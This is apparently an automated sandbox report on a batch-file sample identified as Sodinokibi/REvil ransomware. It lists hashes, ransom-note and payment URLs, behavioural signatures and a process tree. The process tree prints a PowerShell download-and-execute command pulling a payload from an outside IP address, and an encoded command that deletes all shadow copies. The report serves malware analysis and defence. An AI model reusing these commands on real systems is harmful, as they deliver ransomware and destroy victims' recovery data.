Analysis
-
max time kernel
34s -
max time network
53s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
19-05-2020 04:10
Static task
static1
Behavioral task
behavioral1
Sample
a62c4733712a5a0ccf06aa73c58fd3fd.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
a62c4733712a5a0ccf06aa73c58fd3fd.bat
Resource
win10v200430
General
-
Target
a62c4733712a5a0ccf06aa73c58fd3fd.bat
-
Size
217B
-
MD5
05f4de7667d23b9c8dac10fa03d7f205
-
SHA1
8d0d899a76f6cd2d36311f8b8b7ef74bb495b1b0
-
SHA256
28960164b3c1ec21a1ac053ccb4523a2b1dcbc9ee9404895f47be2de3f1aa2b0
-
SHA512
ff8867c98520dff41a1330cffbcfe235c25c3d6f561b87ee42cf670b13c5b296252b9e9dfc11d0a6362c0beb1ab9dceb91dca45451ed80a7f1494e2d77fcaefd
Malware Config
Extracted
http://185.103.242.78/pastes/a62c4733712a5a0ccf06aa73c58fd3fd
Extracted
C:\272h1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/6157148EFE54E3BB
http://decryptor.cc/6157148EFE54E3BB
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3exgc9u9h.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 784 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 784 powershell.exe 784 powershell.exe 784 powershell.exe 1808 powershell.exe 1808 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe 784 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 784 powershell.exe -
Drops file in Program Files directory 28 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ShowUnprotect.mov powershell.exe File opened for modification \??\c:\program files\TestOut.vsx powershell.exe File opened for modification \??\c:\program files\ResetUse.odt powershell.exe File opened for modification \??\c:\program files\SelectReceive.jtx powershell.exe File opened for modification \??\c:\program files\SkipEnable.pptm powershell.exe File created \??\c:\program files\272h1-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareInstall.jpg powershell.exe File opened for modification \??\c:\program files\RequestHide.xhtml powershell.exe File opened for modification \??\c:\program files\SubmitDeny.ps1xml powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\272h1-readme.txt powershell.exe File opened for modification \??\c:\program files\CompleteSelect.mp4 powershell.exe File opened for modification \??\c:\program files\DisableSplit.docm powershell.exe File opened for modification \??\c:\program files\ResetSend.gif powershell.exe File created \??\c:\program files (x86)\272h1-readme.txt powershell.exe File opened for modification \??\c:\program files\StepMerge.nfo powershell.exe File opened for modification \??\c:\program files\AddStep.vstx powershell.exe File opened for modification \??\c:\program files\AddUse.xla powershell.exe File opened for modification \??\c:\program files\EnterLimit.mhtml powershell.exe File opened for modification \??\c:\program files\UseAssert.xlt powershell.exe File opened for modification \??\c:\program files\BackupCopy.easmx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\272h1-readme.txt powershell.exe File opened for modification \??\c:\program files\UnregisterWrite.js powershell.exe File opened for modification \??\c:\program files\EnableStep.wmv powershell.exe File opened for modification \??\c:\program files\UpdateSearch.MTS powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\272h1-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertRedo.dxf powershell.exe File opened for modification \??\c:\program files\RepairStep.dwfx powershell.exe File opened for modification \??\c:\program files\ResetSet.zip powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 676 wrote to memory of 784 676 cmd.exe powershell.exe PID 784 wrote to memory of 1808 784 powershell.exe powershell.exe PID 784 wrote to memory of 1808 784 powershell.exe powershell.exe PID 784 wrote to memory of 1808 784 powershell.exe powershell.exe PID 784 wrote to memory of 1808 784 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeBackupPrivilege 652 vssvc.exe Token: SeRestorePrivilege 652 vssvc.exe Token: SeAuditPrivilege 652 vssvc.exe Token: SeTakeOwnershipPrivilege 784 powershell.exe -
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\a62c4733712a5a0ccf06aa73c58fd3fd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a62c4733712a5a0ccf06aa73c58fd3fd');Invoke-GDTHLNSAQQ;Start-Sleep -s 10000"2⤵
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:652